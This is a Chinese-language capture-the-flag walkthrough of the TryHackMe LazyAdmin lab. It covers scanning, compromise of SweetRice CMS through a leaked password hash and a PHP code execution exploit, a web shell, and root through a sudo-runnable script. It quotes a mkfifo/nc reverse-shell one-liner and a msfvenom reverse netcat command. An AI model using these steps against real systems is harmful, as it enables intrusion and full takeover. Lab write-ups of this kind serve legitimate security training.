TryHackMe-LazyAdmin

靶机链接:LazyAdmin

靶机难度:十分简单

信息收集

nmap扫描后只显示打开了两个端口

  • 22 openssh 7.2p2
  • 80 Apache 2.4.18
1
2
3
4
5
6
7
8
9
10
11
12
[email protected]:~# nmap -sV 10.10.188.166
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-29 22:11 GMT
Nmap scan report for 10.10.188.166
Host is up (0.019s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds

访问网站后什么都没有
apa

尝试探测web目录
content

似乎找到了什么有趣的东西,进行再次扫描。同时访问一下这个路径

sweetrice

好像是一个多站点管理系统。

as

漏洞利用

通过阅读license.txt,我们可以得知这个管理系统的版本为1.5.1

search

找到的exploit有两个很有趣,一个是任意文件上传,一个是任意文件下载。但是这两个都要身份验证。所以暂时只能继续去web找线索.

通过访问/conetnt/inc,发现了一个sql文件。将这个文件下载下来查看后,找到网站管理员帐号密码,不过是md5加密的。
sql

用hashcat跑出来了。
crack

提权

登录网站后台后,我想起有个exploit是可以执行php代码。Cross-Site Request Forgery / PHP Code Execution ,使用这个弱点插入一句话。

使用蚁剑成功连上antsword

查看/etc/passwd后发现还有一个用户
itguy

去他的家目录看看,发现一个有趣的文件.
backuppl

这个文件指向了/etc/copy,sh,让我们去看看这是什么

1
2
$ cat copy.sh	
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

很明显就是一个后门,让我们把这个反弹的连接指向我们。

1
msfvenom -p cmd/unix/reverse_netcat LHOST=10.1.1.1 LPORT=1234 R

使用msf生成payload,将内容替换。

查看一下看有没有sudo
sudo

允许任何人无需密码的以root身份执行这个文件。

接下来就简单了,nc打开简单,执行这个文件就好了。

拿到shell
root

总结

比较简单,培养渗透思维。